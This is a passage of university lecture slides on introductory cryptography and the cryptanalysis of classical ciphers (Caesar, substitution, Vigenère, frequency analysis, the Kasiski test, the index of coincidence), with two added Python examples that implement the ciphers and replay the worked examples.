  – "The system must not be required to be secret, and it must be able to fall into the hands of the enemy without inconvenience."
  – Secrecy must reside entirely in the key
  – Must assume that the enemy has complete details of the cryptographic algorithm
  – The enemy will reverse engineer your algorithm
Cryptography and Cryptanalysis

• Cryptanalysis is the study of methods for obtaining the meaning of encrypted information without access to the secret information
  – Needs knowledge of the general characteristics of the plaintext, or of some sample plaintext-ciphertext pairs
  – Ciphertext-only attack
    • Search over the keys; requires recognizable plaintext and enough ciphertext
  – Known-plaintext attack
  – Chosen-plaintext attack
Cryptanalysis: Ciphertext-Only Attacks

• Concept
  – Attackers exploit the encrypted data (ciphertext) itself, without additional information, to breach security.
• Objective:
  – To recover the original plaintext or the key.
• Strategies:
  – Brute Force: attempting every key until the correct plaintext is found.
  – Pattern Detection: searching for known plaintext structures within the ciphertext.
  – Statistical Analysis: using large volumes of ciphertext to identify patterns, which may expose the plaintext or the key if the algorithm has weaknesses.
• Example: frequency leakage

Cryptanalysis: Known-Plaintext Attacks

• Concept:
  – Attackers possess both the unencrypted message (plaintext) and its encrypted version (ciphertext).
• Objective:
  – To infer the encryption key and decrypt other messages encrypted with the same key.
• Strategy:
  – Attackers analyze the given plaintext-ciphertext pairs; they cannot choose the encryption input and must work with the data they have.
• Key Point:
  – Aims to recover the key from known data pairs without influencing the encryption input.

Cryptanalysis: Chosen-Plaintext Attacks

• Concept:
  – Attackers can proactively choose arbitrary plaintexts and obtain the corresponding ciphertexts.
• Objective:
  – Examine how chosen patterns in the plaintext translate to the ciphertext.
• Strategies:
  – Detect linear or nonlinear relationships in the encryption.
  – Discover collisions to infer key or algorithm details.
  – Actively engage with the encryption system to test hypotheses about how it encrypts messages.
• Key Point:
  – Actively probe the encryption process, uncovering deeper insights into its mechanism.

KPAs vs. CPAs

• They differ in terms of the attacker's capabilities
• Known-Plaintext Attacks (KPAs) involve attackers passively utilizing existing data.
  – They have access to both the plaintext and the ciphertext, but no control over which plaintexts get encrypted.
• Chosen-Plaintext Attacks (CPAs) permit attackers to actively select inputs, offering more insight into the encryption process.
• CPA is a stronger attack model than KPA because it allows the attacker to target specific aspects of the encryption algorithm.
Cryptanalysis: Examples

• Ciphertext-Only Attacks
  – Historical: Allied codebreakers cracked the German Enigma machine during WWII through pattern analysis and cryptanalytic techniques (helped considerably by "cribs", i.e., guessed plaintext).
  – Contemporary: modern brute-force attacks attempt to decrypt by trying every possible key; countered by using longer keys.
• Known-Plaintext Attacks
  – Cold War espionage: intelligence agencies used known plaintext to recover keys when they had access to both the encrypted and the decrypted content.
• Chosen-Plaintext Attacks
  – Public-key encryption: the public key is available to everyone, so an attacker can encrypt any plaintext of their choice; the RSA Factoring Challenge published such public moduli for researchers to attempt to factor, in contests designed to test cryptographic strength.
Cryptography and Cryptanalysis

• Goal of cryptanalysis: break the algorithm
  – Total break: find the key K such that D(K, C) = P
  – Global deduction: find an alternative algorithm A equivalent to D(K, C), without knowing K
  – Instance (or local) deduction: find the plaintext of an intercepted ciphertext
  – Information deduction: get some information about the key or the plaintext
    • the first bits of the key,
    • information about the form of the plaintext, ...

• Definition of Security
  – Unconditionally secure / perfect security
    • The ciphertext does not contain enough information to uniquely determine the plaintext
    • No matter how hard the opponent tries, even with un­limited computing power
    • Example: the one-time pad
  – Computationally secure
    • The cost of breaking the cipher exceeds the value of the encrypted data, or
    • The time needed to break the cipher exceeds the useful lifetime of the data

• Brute-Force Attack
  – Try every possible key on the ciphertext until an intelligible translation into plaintext is obtained
  – On average, half of the keys must be tried
  – Costly when the key space is large
  – Remember Moore's Law: the attacker's computing power keeps growing
Cryptosystems

• Secret key cryptography
  – Involves the use of one key
• Public key cryptography
  – Involves the use of two keys (a pair)
    • A public key and a private key
• Hash functions
  – Involve the use of no key
  – Nothing secret: how can this be useful?

• Secret Key Cryptography
  – Also known as symmetric key encryption
  – Bob and Alice share the same (symmetric) key
  – a.k.a. private-key encryption, single-key encryption, symmetric-key encryption, or conventional encryption
      C = E(K, P)
      P = D(K, C) = D(K, E(K, P))

[Figure: plaintext message m → encryption algorithm (shared key K_S) → ciphertext E(K, m) → decryption algorithm (shared key K_S) → plaintext m = D(K, E(K, m))]

• Requirements for secret key cryptography
  – The encryption algorithm is publicly known
  – Secure use of symmetric encryption implies:
    • a strong encryption algorithm
    • a secret key known only to the sender and receiver
  – Need a secure channel to distribute keys!
• Example: Advanced Encryption Standard (AES)
  – Encrypts sensitive data for government and private-sector use, protecting files on storage devices and during internet transmission.
Cryptosystems

• Public Key Cryptography
  – a.k.a. asymmetric encryption
  – Bob has a pair of keys, one public and one private
  – Bob's public key is known to Alice
    • Alice uses Bob's public key to encrypt the message; only Bob's private key decrypts it
      C = E(Kpub, P)
      P = D(Kpri, C) = D(Kpri, E(Kpub, P))

[Figure: plaintext message m → encryption algorithm (Bob's public key Kpub) → ciphertext E(Kpub, m) → decryption algorithm (Bob's private key Kpri) → plaintext D(Kpri, E(Kpub, m))]

• Example
  – RSA (Rivest–Shamir–Adleman)
  – RSA secures data transmission over the internet, including web browsing and email, and protects online transactions like credit card purchases.
Cryptosystems

• Cryptographic hash
  – Hash algorithms are also known as message digests or one-way transformations
    • Fixed-length output, condensing, one-wayness
  – Password hashing: secure password storage
  – Message integrity: keyed hash
  – Message fingerprint: digest
  – Digital signature efficiency: sign the short digest instead of the whole message

[Figure: messages of arbitrary length hashed to fixed-length digests. Image courtesy of medium.com]

• Example: Secure Hash Algorithm SHA-256
  – SHA-256 is used in security protocols such as TLS and SSL, PGP, SSH, and IPsec, as well as in blockchains, to validate data integrity and authenticity.
  • Input: "Hello World"
  • SHA-256 output: a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e
  • It produces a 256-bit hash value, typically represented as 64 hexadecimal digits.
Elementary Cryptography

Secret Key Cryptography

Caesar Cipher

• One of the oldest cryptosystems
• Caesar Cipher: every letter is replaced with the letter three positions to the right in the alphabet (wrapping around after Z).
• A very simple shift cipher, which is itself a kind of substitution cipher
  – Plaintext: ATTACK AT FIVE
  – Ciphertext: DWWDFN DW ILYH

• Quiz
  – Break the following Caesar cipher (shifted by 3)
  – HQMRB BRXU FKRFRODWH

• Formal definition (letters numbered A = 0, ..., Z = 25)
  – Encryption: E_K(m) = (m + 3) mod 26
  – Decryption: D_K(c) = (c - 3) mod 26
Shift Cipher

• The Caesar cipher is a special case of the shift cipher
• Shift cipher with key K ∈ {0, ..., 25}
  – Encryption: E_K(m) = (m + K) mod 26
  – Decryption: D_K(c) = (c - K) mod 26
  – Example with K = 15:
      plaintext:  abcdefghijklmnopqrstuvwxyz
      ciphertext: pqrstuvwxyzabcdefghijklmno

• How secure is the shift cipher?
• Breaking a shift cipher: still easy!
• Brute force: how many possibilities?
  – 26
  – Maybe just 25 (K = 0 leaves the plaintext unchanged)...

• Breaking a shift cipher: still easy!
• See the code illustration.

  YHKMNGX PABVA ATL T ZKXTM WXTE HY IHPXK BG HMAXK FTMMXKL UNM XLIXVBTEER BG PTK VTG UKBGZ TUHNM ZKXTM VATGZXL BG T LBMNTMBHG MAKHNZA OXKR LEBZAM YHKVXL
Substitution Cipher

• The shift cipher is a special case of the substitution cipher
• A substitution cipher substitutes one thing for another
  – Monoalphabetic cipher: substitute one letter for another
  – Key: the mapping from the set of 26 letters to the set of 26 letters

• Monoalphabetic cipher: substitute one letter for another
      plaintext:  abcdefghijklmnopqrstuvwxyz
      ciphertext: mnbvcxzasdfghjklpoiuytrewq
  – Alice: Hello Bob
  – Ciphertext: ACGGK NKN

• Monoalphabetic cipher: substitute one letter for another
  – The key can be any permutation of the 26 alphabetic characters
  – One-to-one mapping (bijection), so decryption simply applies the inverse permutation
  Enc: read the plaintext letter in the top row and write the letter below it
  Dec: read the ciphertext letter in the bottom row and write the letter above it
Substitution Cipher

• Breaking the monoalphabetic cipher
• Brute force attack
  – Question: how many possible keys? i.e., how many possible substitution alphabets?
    • 26! ≈ 4 × 10^26
  – Is it secure enough? Can we try all permutations?
    • 10^9 guesses per second per node
    • 10K nodes, i.e., 10^13 guesses per second in total
    • How much time do we need? 4 × 10^26 / 10^13 = 4 × 10^13 seconds ≈ 1.3 × 10^6 years
    • So brute force is hopeless, but a large key space alone does not make a cipher secure

• Breaking the monoalphabetic cipher
• Frequency analysis
  – In English, letter frequencies are far from uniform
  [Figure: letter frequencies in English text. This figure is from Introduction to Modern Cryptography (2nd Edition), Jonathan Katz and Yehuda Lindell, Chapman & Hall/CRC, 2014]

• Breaking the monoalphabetic cipher ... is easy!
  – Cryptanalysts use properties of the plaintext
    • Frequencies leak!
    • Encryption is deterministic (e.g., a always maps to X)
      plaintext:  c a n a d a
      ciphertext: Y X S X A X

• Breaking the monoalphabetic cipher
• Frequency analysis
  [Figure: letter-frequency histogram of a ciphertext]

• Breaking the monoalphabetic cipher
  – Similarly, we have frequencies of digrams, trigrams, initial letters, final letters, etc.
  – Common English digrams and trigrams:
      Digrams   Trigrams
      EN        ENT
      RE        ION
      ER        AND
      NT        ING
      TH        IVE
      ON        TIO
      IN        FOR
      TF        OUR
      AN        THI
      OR        ONE
Substitution Cipher

• Breaking the monoalphabetic cipher: a worked example

  Ciphertext:
  GS SGU WL LS KZAVU YJAY JU WL GSY XWLYNZKUX KR LSPUYJWGO NGUQHUMYUX

  – Frequency analysis of the ciphertext:
    U: 8; Y: 6; G: 5; S: 5; L: 5; W: 4; J: 3; K: 3; X: 3; A: 2; N: 2; Z: 2
  – U is the most frequent letter, so guess U → E:
    GS SGE WL LS KZAVE YJAY JE WL GSY XWLYNZKEX KR LSPEYJWGO NGEQHEMYEX
  – Frequent two-letter words? WL occurs twice; guess WL → IS, i.e., W → I and L → S:
    GS SGE IS SS KZAVE YJAY JE IS GSY XISYNZKEX KR SSPEYJIGO NGEQHEMYEX
  – SS must be a two-letter word starting with S: SS → SO, so S → O:
    GO OGE IS SO KZAVE YJAY JE IS GOY XISYNZKEX KR SOPEYJIGO NGEQHEMYEX
  – What is G? GO and OGE read as NO and ONE, so G → N:
    NO ONE IS SO KZAVE YJAY JE IS NOY XISYNZKEX KR SOPEYJINO NNEQHEMYEX
  – What is Y? NOY → NOT, so Y → T:
    NO ONE IS SO KZAVE TJAT JE IS NOT XISTNZKEX KR SOPETJINO NNEQHEMTEX
  – What are J and A? TJAT → THAT, so J → H and A → A:
    NO ONE IS SO KZAVE THAT HE IS NOT XISTNZKEX KR SOPETHINO NNEQHEMTEX
  – SOPETHINO → SOMETHING, so P → M and O → G:
    NO ONE IS SO KZAVE THAT HE IS NOT XISTNZKEX KR SOMETHING NNEQHEMTEX
  – Words ending in ---EX: ER, ED or ES? ED fits both, so X → D:
    NO ONE IS SO KZAVE THAT HE IS NOT DISTNZKED KR SOMETHING NNEQHEMTED
  – Mapping so far: U → E, Y → T, G → N, S → O, L → S, W → I, J → H, A → A, P → M, O → G, X → D; the remaining letters (K, Z, R, N, Q, H, M) are recovered the same way, from the words they sit in
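An added example (the editor's Python, not code from the lecture) that implements the monoalphabetic cipher and replays the frequency-analysis walkthrough above in code: it reproduces the letter counts, applies the guesses in the order the slides make them, and checks that each intermediate text matches. The final seven guesses that complete the quote are the editor's continuation of the same word-by-word reasoning, not part of the slides.

```python
import string
from collections import Counter

ALPHABET = string.ascii_uppercase


def make_key(cipher_alphabet: str) -> dict:
    """Build the encryption table from a 26-letter permutation (the key)."""
    cipher_alphabet = cipher_alphabet.upper()
    if sorted(cipher_alphabet) != list(ALPHABET):
        raise ValueError("key must be a permutation of the 26 letters")
    return dict(zip(ALPHABET, cipher_alphabet))


def substitute(text: str, table: dict) -> str:
    """Apply a (possibly partial) letter mapping; unmapped letters pass through."""
    return "".join(table.get(ch, ch) for ch in text.upper())


def sub_encrypt(plaintext: str, key: str) -> str:
    return substitute(plaintext, make_key(key))


def sub_decrypt(ciphertext: str, key: str) -> str:
    inverse = {c: p for p, c in make_key(key).items()}   # bijection: invert it
    return substitute(ciphertext, inverse)


def letter_frequencies(text: str):
    """Letters of `text` as (letter, count) pairs, most frequent first."""
    counts = Counter(ch for ch in text.upper() if ch in ALPHABET)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def apply_guesses(ciphertext: str, guesses):
    """Replay a sequence of (cipher letter, plain letter) guesses and return each
    intermediate text as the cryptanalyst sees it: solved letters are shown as
    plaintext, unsolved ones stay as ciphertext."""
    table, steps = {}, []
    for c, p in guesses:
        table[c] = p
        steps.append(substitute(ciphertext, table))
    return steps


# Ciphertext from the lecture's worked example.
SLIDE_CIPHERTEXT = ("GS SGU WL LS KZAVU YJAY JU WL GSY XWLYNZKUX KR "
                    "LSPUYJWGO NGUQHUMYUX")

# The guesses made step by step on the slides, in order.
SLIDE_GUESSES = [("U", "E"), ("W", "I"), ("L", "S"), ("S", "O"), ("G", "N"),
                 ("Y", "T"), ("J", "H"), ("A", "A"), ("P", "M"), ("O", "G"),
                 ("X", "D")]

# Editor's continuation (not on the slides): KZAVE -> BRAVE, DISTNZKED -> DISTURBED,
# KR -> BY, NNEQHEMTED -> UNEXPECTED.
FULL_GUESSES = SLIDE_GUESSES + [("K", "B"), ("Z", "R"), ("R", "Y"), ("N", "U"),
                                ("Q", "X"), ("H", "P"), ("M", "C")]


if __name__ == "__main__":
    print(letter_frequencies(SLIDE_CIPHERTEXT))
    for step in apply_guesses(SLIDE_CIPHERTEXT, FULL_GUESSES):
        print(step)
```

The mapping is applied to the original ciphertext at every step rather than chained, so a guess such as H → P cannot be confused with the earlier P → M; that is also why the slides can show the unsolved cipher N next to a solved N (from G) in NNEQHEMTED without ambiguity.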
Cryptanalysis: Frequency Leakage

• The frequency distribution of English letters is known.
  [Figure: letter frequencies in English text. This figure is from Introduction to Modern Cryptography (2nd Edition), Jonathan Katz and Yehuda Lindell, Chapman & Hall/CRC, 2014]

• Assume the ciphertext is very long
• Count the frequency of each character in the ciphertext
  – If count(N) is the greatest (i.e., around 13% of the length of the ciphertext), then N → e
  – Some guesses may need more tries
• We need to hide frequencies!

• Practice: the frequency of character X is around 10%; it could be e (12.7%), t (9.1%) or a (8.2%)

• Practice: the frequency of character F is around 7%; it could be a (8.2%), i (7.0%), n (6.7%) or s (6.3%)

• Quiz: given X (7.3%), Y (6.3%), Z (6.9%)
• Question: what is the message XYZX?
  – X (7.3%) could be i (7.0%) or o (7.5%)
  – Y (6.3%) could be s (6.3%) or h (6.1%)
  – Z (6.9%) could be i (7.0%) or n (6.9%)
  – Try 1: isni
  – Try 2: ihni
  – Try 3: osio
  – Try 4: ohio (the only candidate that is an English word)
Recap: Shift Cipher

[Figure: recap of the shift cipher]

Recap: Substitution Cipher

[Figure: recap of the substitution cipher]
Limitations

• Problem with the monoalphabetic cipher?
  – One mapping scheme for the entire encryption process
  – Cryptanalysts can observe the patterns of the natural language in the ciphertext
• Countermeasure
  – Use a different mapping for each character of the plaintext
  – Increases the complexity of the cipher and makes it more resistant to cryptanalysis techniques like frequency analysis.

Substitution Cipher

• Breaking the monoalphabetic cipher ... is easy!
  – Cryptanalysts use properties of the plaintext
  – What can be the cryptographers' counter-moves?
  – Polyalphabetic ciphers
    • use multiple alphabets
  – Homophonic ciphers
    • multiple possible output characters for an input character
  – Polygram ciphers
    • encipher groups of letters at once

Vigenère Cipher

• The Vigenère Cipher
  – Best known polyalphabetic cipher.
  – Construct a table (the Vigenère tableau)
  – Each row in the table is a different shift (alphabet)
    • Why shift ciphers instead of arbitrary monoalphabetic substitutions?
  – Sender and receiver agree on a sequence of rows in the table, i.e., the key
  – Helps to hide patterns
Vigenère Tableau

0 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
1 B C D E F G H I J K L M N O P Q R S T U V W X Y Z A
2 C D E F G H I J K L M N O P Q R S T U V W X Y Z A B
3 D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
4 E F G H I J K L M N O P Q R S T U V W X Y Z A B C D
5 F G H I J K L M N O P Q R S T U V W X Y Z A B C D E
6 G H I J K L M N O P Q R S T U V W X Y Z A B C D E F
7 H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
8 I J K L M N O P Q R S T U V W X Y Z A B C D E F G H
9 J K L M N O P Q R S T U V W X Y Z A B C D E F G H I
10 K L M N O P Q R S T U V W X Y Z A B C D E F G H I J
11 L M N O P Q R S T U V W X Y Z A B C D E F G H I J K
12 M N O P Q R S T U V W X Y Z A B C D E F G H I J K L
13 N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
14 O P Q R S T U V W X Y Z A B C D E F G H I J K L M N
15 P Q R S T U V W X Y Z A B C D E F G H I J K L M N O
16 Q R S T U V W X Y Z A B C D E F G H I J K L M N O P
17 R S T U V W X Y Z A B C D E F G H I J K L M N O P Q
18 S T U V W X Y Z A B C D E F G H I J K L M N O P Q R
19 T U V W X Y Z A B C D E F G H I J K L M N O P Q R S
20 U V W X Y Z A B C D E F G H I J K L M N O P Q R S T
21 V W X Y Z A B C D E F G H I J K L M N O P Q R S T U
22 W X Y Z A B C D E F G H I J K L M N O P Q R S T U V
23 X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
24 Y Z A B C D E F G H I J K L M N O P Q R S T U V W X
25 Z A B C D E F G H I J K L M N O P Q R S T U V W X Y
Vigenère Cipher

• The Vigenère Cipher
  – Alice and Bob agree on {5, 19, 7, 11, 21} as the key
  – In encryption, the key rows are used cyclically:
    • Encrypt letter 1 with row 5
    • Encrypt letter 2 with row 19
    • Encrypt letter 3 with row 7
    • Encrypt letter 4 with row 11
    • Encrypt letter 5 with row 21
    • Encrypt letter 6 with row 5
    • Encrypt letter 7 with row 19
    • Encrypt letter 8 with row 7
    • ...
Vigenère Cipher

• Encrypt "school" with K = {5, 19, 7, 11, 21}
• Letter 1: S with row 5 → X
• Letter 2: C with row 19 → V
• Letter 3: H with row 7 → O
• Ciphertext so far: XVO (in the tableau, the row is the key value and the column is the plaintext letter)
16 Q R S T U V W X Y Z A B C D E F G H I J K L M N O P
17 R S T U V W X Y Z A B C D E F G H I J K L M N O P Q
18 S T U V W X Y Z A B C D E F G H I J K L M N O P Q R
19 T U V W X Y Z A B C D E F G H I J K L M N O P Q R S
20 U V W X Y Z A B C D E F G H I J K L M N O P Q R S T
21 V W X Y Z A B C D E F G H I J K L M N O P Q R S T U
22 W X Y Z A B C D E F G H I J K L M N O P Q R S T U V
23 X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
24 Y Z A B C D E F G H I J K L M N O P Q R S T U V W X
25 Z A B C D E F G H I J K L M N O P Q R S T U V W X Y
71
CIS 4520
Introduction to Vigenere Cipher
Cryptography

Wenjing Zhang
• Encrypt “school” with K={5, 19, 7, 11, 21}
• XVO
• Letter 4: O → Z
0 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
1 B C D E F G H I J K L M N O P Q R S T U V W X Y Z A
2 C D E F G H I J K L M N O P Q R S T U V W X Y Z A B
3 D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
4 E F G H I J K L M N O P Q R S T U V W X Y Z A B C D
5 F G H I J K L M N O P Q R S T U V W X Y Z A B C D E
6 G H I J K L M N O P Q R S T U V W X Y Z A B C D E F
7 H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
8 I J K L M N O P Q R S T U V W X Y Z A B C D E F G H
9 J K L M N O P Q R S T U V W X Y Z A B C D E F G H I
10 K L M N O P Q R S T U V W X Y Z A B C D E F G H I J
11 L M N O P Q R S T U V W X Y Z A B C D E F G H I J K
12 M N O P Q R S T U V W X Y Z A B C D E F G H I J K L
13 N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
14 O P Q R S T U V W X Y Z A B C D E F G H I J K L M N
15 P Q R S T U V W X Y Z A B C D E F G H I J K L M N O
16 Q R S T U V W X Y Z A B C D E F G H I J K L M N O P
17 R S T U V W X Y Z A B C D E F G H I J K L M N O P Q
18 S T U V W X Y Z A B C D E F G H I J K L M N O P Q R
19 T U V W X Y Z A B C D E F G H I J K L M N O P Q R S
20 U V W X Y Z A B C D E F G H I J K L M N O P Q R S T
21 V W X Y Z A B C D E F G H I J K L M N O P Q R S T U
22 W X Y Z A B C D E F G H I J K L M N O P Q R S T U V
23 X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
24 Y Z A B C D E F G H I J K L M N O P Q R S T U V W X
25 Z A B C D E F G H I J K L M N O P Q R S T U V W X Y
72
CIS 4520
Introduction to Vigenere Cipher
Cryptography

Wenjing Zhang
• Encrypt “school” with K={5, 19, 7, 11, 21}
• XVOZ
• Letter 5: O → J
0 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
1 B C D E F G H I J K L M N O P Q R S T U V W X Y Z A
2 C D E F G H I J K L M N O P Q R S T U V W X Y Z A B
3 D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
4 E F G H I J K L M N O P Q R S T U V W X Y Z A B C D
5 F G H I J K L M N O P Q R S T U V W X Y Z A B C D E
6 G H I J K L M N O P Q R S T U V W X Y Z A B C D E F
7 H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
8 I J K L M N O P Q R S T U V W X Y Z A B C D E F G H
9 J K L M N O P Q R S T U V W X Y Z A B C D E F G H I
10 K L M N O P Q R S T U V W X Y Z A B C D E F G H I J
11 L M N O P Q R S T U V W X Y Z A B C D E F G H I J K
12 M N O P Q R S T U V W X Y Z A B C D E F G H I J K L
13 N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
14 O P Q R S T U V W X Y Z A B C D E F G H I J K L M N
15 P Q R S T U V W X Y Z A B C D E F G H I J K L M N O
16 Q R S T U V W X Y Z A B C D E F G H I J K L M N O P
17 R S T U V W X Y Z A B C D E F G H I J K L M N O P Q
18 S T U V W X Y Z A B C D E F G H I J K L M N O P Q R
19 T U V W X Y Z A B C D E F G H I J K L M N O P Q R S
20 U V W X Y Z A B C D E F G H I J K L M N O P Q R S T
21 V W X Y Z A B C D E F G H I J K L M N O P Q R S T U
22 W X Y Z A B C D E F G H I J K L M N O P Q R S T U V
23 X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
24 Y Z A B C D E F G H I J K L M N O P Q R S T U V W X
25 Z A B C D E F G H I J K L M N O P Q R S T U V W X Y
73
CIS 4520
Introduction to Vigenere Cipher
Cryptography

Wenjing Zhang
• Rows: letters, not numbers
• Key: a phrase
a A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
b B C D E F G H I J K L M N O P Q R S T U V W X Y Z A
c C D E F G H I J K L M N O P Q R S T U V W X Y Z A B
d D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
e E F G H I J K L M N O P Q R S T U V W X Y Z A B C D
f F G H I J K L M N O P Q R S T U V W X Y Z A B C D E
g G H I J K L M N O P Q R S T U V W X Y Z A B C D E F
h H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
i I J K L M N O P Q R S T U V W X Y Z A B C D E F G H
j J K L M N O P Q R S T U V W X Y Z A B C D E F G H I
k K L M N O P Q R S T U V W X Y Z A B C D E F G H I J
l L M N O P Q R S T U V W X Y Z A B C D E F G H I J K
m M N O P Q R S T U V W X Y Z A B C D E F G H I J K L
n N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
o O P Q R S T U V W X Y Z A B C D E F G H I J K L M N
p P Q R S T U V W X Y Z A B C D E F G H I J K L M N O
q Q R S T U V W X Y Z A B C D E F G H I J K L M N O P
r R S T U V W X Y Z A B C D E F G H I J K L M N O P Q
s S T U V W X Y Z A B C D E F G H I J K L M N O P Q R
t T U V W X Y Z A B C D E F G H I J K L M N O P Q R S
u U V W X Y Z A B C D E F G H I J K L M N O P Q R S T
v V W X Y Z A B C D E F G H I J K L M N O P Q R S T U
w W X Y Z A B C D E F G H I J K L M N O P Q R S T U V
x X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
y Y Z A B C D E F G H I J K L M N O P Q R S T U V W X
z Z A B C D E F G H I J K L M N O P Q R S T U V W X Y
74

Vigenere Cipher
• Encrypt “JAYHAWK” with the phrase “EECS” (same table as above), one letter per step:
• N, NE, NEA, NEAZ, NEAZE, NEAZEA, NEAZEAM
81

Vigenere Cipher
• Do we really need the table?
• Encrypt “JAYHAWK” with “EECS”
– Letter 1: (J + E) mod 26
• (J + 4) mod 26 = N
– Letter 2: (A + E) mod 26 = E
– Letter 3: (Y + C) mod 26 = A
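The arithmetic form of the cipher used on this slide, as an added example (not code from the lecture slides): the key may be a list of shifts such as K={5, 19, 7, 11, 21} or a phrase such as “EECS”, and letter i is encrypted as (P_i + K_{i mod m}) mod 26. It reproduces the worked examples above; the sixth letter of “school” (not shown on the slides) reuses the first shift, because the key repeats. All function names are this example's own.

```python
# Added example (not from the CIS 4520 slides): Vigenere encryption and
# decryption done with arithmetic mod 26 instead of the tabula recta.
# The key may be a list of shifts, as in K={5, 19, 7, 11, 21}, or a phrase
# such as "EECS", whose letters are converted to shifts (A=0, ..., Z=25).
from typing import Iterable, List, Union

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def key_to_shifts(key: Union[str, Iterable[int]]) -> List[int]:
    """Normalise a key phrase or a list of integers to a list of shifts 0..25."""
    if isinstance(key, str):
        shifts = [ALPHABET.index(ch) for ch in key.upper() if ch in ALPHABET]
    else:
        shifts = [int(k) % 26 for k in key]
    if not shifts:
        raise ValueError("key must contain at least one shift")
    return shifts


def vigenere_encrypt(plaintext: str, key) -> str:
    """C_i = (P_i + K_{i mod m}) mod 26; characters outside A-Z are dropped."""
    shifts = key_to_shifts(key)
    letters = [ch for ch in plaintext.upper() if ch in ALPHABET]
    return "".join(
        ALPHABET[(ALPHABET.index(p) + shifts[i % len(shifts)]) % 26]
        for i, p in enumerate(letters)
    )


def vigenere_decrypt(ciphertext: str, key) -> str:
    """P_i = (C_i - K_{i mod m}) mod 26: the inverse shift."""
    shifts = key_to_shifts(key)
    letters = [ch for ch in ciphertext.upper() if ch in ALPHABET]
    return "".join(
        ALPHABET[(ALPHABET.index(c) - shifts[i % len(shifts)]) % 26]
        for i, c in enumerate(letters)
    )


def encrypt_with_trace(plaintext: str, key) -> List[str]:
    """Per-letter trace in the slides' style, e.g. 'J + E(4) -> N'."""
    sh = key_to_shifts(key)
    trace = []
    for i, p in enumerate(c for c in plaintext.upper() if c in ALPHABET):
        k = sh[i % len(sh)]
        c = ALPHABET[(ALPHABET.index(p) + k) % 26]
        trace.append(f"{p} + {ALPHABET[k]}({k}) -> {c}")
    return trace


if __name__ == "__main__":
    # "school" under K={5,19,7,11,21}: the slides stop at XVOZJ; the sixth
    # letter reuses the first shift (5) because the key repeats.
    print(vigenere_encrypt("school", [5, 19, 7, 11, 21]))   # XVOZJQ
    for line in encrypt_with_trace("JAYHAWK", "EECS"):     # NEAZEAM
        print(line)
    print(vigenere_encrypt("SECURITY", "GUELPH"))           # YYGFGPZS
    print(vigenere_decrypt("YYGFGPZS", "GUELPH"))           # SECURITY
```

Decryption subtracts the same shifts, so the quiz answer “YYGFGPZS” under “GUELPH” comes back as “SECURITY”.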

82

Security of Vigenere Cipher
• Vigenere masks the frequency with which a character appears in a language
– one letter in the ciphertext corresponds to multiple letters in the plaintext.
• Employ several shift ciphers simultaneously, each based on a different letter of the key, which makes the use of frequency analysis more difficult.
• A Vigenere cipher-encrypted message consists of a collection of shift ciphers, each corresponding to a letter in the key.

83

Vigenere Cipher
• Quiz
– Use Key = “GUELPH” to encrypt Plaintext = “SECURITY”

84

Vigenere Cipher
• Quiz
– Use Key = “GUELPH” to encrypt Plaintext = “SECURITY”
– Ciphertext = “YYGFGPZS”

85

Recap: Shift Cipher

86

Recap: Substitution Cipher

87

Recap: Vigenere Cipher

88

Size of Key Space

89

Vigenere Cipher: Cryptanalysis
• Question: is Vigenere Cipher safe?

• Observation: consists of multiple shift ciphers

• Attack method:
– Determine the key length.
– Break the ciphertext into sub-pieces encrypted
with the same key letter.
– Solve each piece as a shift cipher.

90

How to Find the Key Length?
• Observation: for Vigenere, as the length of the key increases, the letter frequency shows less English-like characteristics and becomes more random, since the same letter in the message can be encrypted in different ways.
• Two methods to find the key length:
– Kasiski test
• looks for repeating sequences of letters in the ciphertext, which can indicate the key length.
– Index of coincidence
• shows the likelihood of repeating letters in the ciphertext, suggesting the key length by the level of randomness.
91

Kasiski Test
• Powerful tool for cryptanalysis; analyze and break coded messages that use periodic keys
• Note: two identical segments (sub-strings) of plaintext will be encrypted to the same ciphertext if they occur in the text at a distance δ with δ ≡ 0 (mod m), where m is the key length.
• Algorithm:
– Search for pairs of identical segments (i.e., repeated sub-strings) of length at least 3
– Record the distances between the two segments: δ1, δ2, …
– m divides gcd(δ1, δ2, …)
92

Kasiski Test
• Example

93

Index of Coincidence
• Concept: A statistical measure of the likelihood
that two randomly selected letters from a string
are equal.
– Match ciphertext letter distribution with natural
language.
– Determining key length for polyalphabetic ciphers, e.g.,
Vigenere cipher

• Importance:
– Informs how the text is structured and how it might be
encrypted.
– Reveals cipher complexity: whether a simple
substitution cipher or a more complex method like a
polyalphabetic cipher has been used.

94

Index of Coincidence (IC)

95

Index of Coincidence (IC)
• Note: given the frequencies of all letters in an alphabet, IC is a feature of the frequencies: it does not change under substitution

96

Index of Coincidence of English
• For English, $p_i = n_i / N$ can be estimated:

$$I_c(x) = \sum_{i=0}^{25} p_i^2 = 0.065$$

• This value represents the expected coincidence rate for a random English text.
• Used as a reference to determine if ciphertexts are written in English or to infer the cipher key length.
97

How to Find the Key Length?
• If m is the key length, then the text “looks like” English text:

$$I_c(x) = \sum_{i=0}^{25} p_i^2 = 0.065$$

• If m is not the key length, the text “looks like” random text:

$$I_c \approx \sum_{i=0}^{25} \left(\frac{1}{26}\right)^2 = 26 \cdot \frac{1}{26^2} = \frac{1}{26} \approx 0.038$$

98

Use IC to Find Key Length: Algorithm
1. Assume key length, m, starting with a value of 2.
